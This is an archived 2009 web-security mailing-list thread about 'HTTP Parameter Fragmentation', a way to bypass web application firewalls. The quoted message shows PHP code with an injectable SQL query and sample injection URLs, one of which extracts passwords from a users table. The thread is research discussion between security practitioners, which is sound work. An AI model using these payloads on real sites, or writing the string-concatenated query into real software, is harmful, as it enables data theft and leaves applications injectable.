[WEB SECURITY] HTTP parameters fragmentation

Prasad Shenoy prasad.shenoy at gmail.com
Wed Aug 19 14:59:06 EDT 2009


Steve Pinkham nailed it I guess. It is a form of HPP? No?

P. N. Shenoy

On Wed, Aug 19, 2009 at 1:02 PM, lavakumar kuppan <lavakumar.in at gmail.com>wrote:

> Hi Dmitriy,
>
> That is very interesting. It very closely resembles the ModSecurity Filter
> Bypass that I had discovered sometime back.
> There is just one small difference, I was using the same parameter multiple
> times(HTTP Parameter Pollution) while you are using multiple parameters,
> nice trick!
>
> I had written a whitepaper on the same, you can find it at
> http://lavakumar.com/Split_and_Join.pdf
> The ModSecurity advisory is at http://lavakumar.com/modsecurity_hpp.txt
>
> You can find more information about HPP at
> http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
>
> Hope this helps.
>
> Cheers,
> Lava
> http://www.lavakumar.com
>
>
> 2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com>:
>
> > While preparing an article about WAF bypassing methods, I found an
> > interesting way to bypass filters via HTTP parameters fragmentation.
> >
> >
> >
> > Vulnerable code example
> >
> > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
> >
> >
> >
> > The following request doesn’t allow to conduct an attack
> >
> > index.php?a=1+union+select+1,2/*
> >
> >
> >
> > The following request’s succeeded using HPF
> >
> > index.php?a=1+union/*&b=*/select+1,2
> >
> >
> >
> > In the case, SQL request looks like
> >
> > select * from table where a=1 union/* and b=*/select 1,2
> >
> >
> >
> > Another example:
> >
> > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']."
> limit
> > ".$_GET['c']);
> >
> > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']."
> order
> > by ".$_GET['c']." limit 1");
> >
> >
> >
> > Using HPF (HTTP Parameter Fragmentation), the request’s succeeded:
> >
> > index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
> >
> >
> >
> > The question is: is there any name for the technique? Please, advise me
> if
> > you know articles or experts in  the field (for example, I found a
> reference
> > in
> >
> http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
> ,
> > page 79).
> >
> > Thank you for help and cooperation in advance!
> >
> >
> >
> > - - - - - - - - - - - - - - -
> > Best Regards, Dmitry Evteev
> > Positive Technologies Co.
> > Tel.: (495) 744-0144
> > Web: http://www.ptsecurity.ru
> >
> >
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20090819/1838656a/attachment.html>


More information about the websecurity mailing list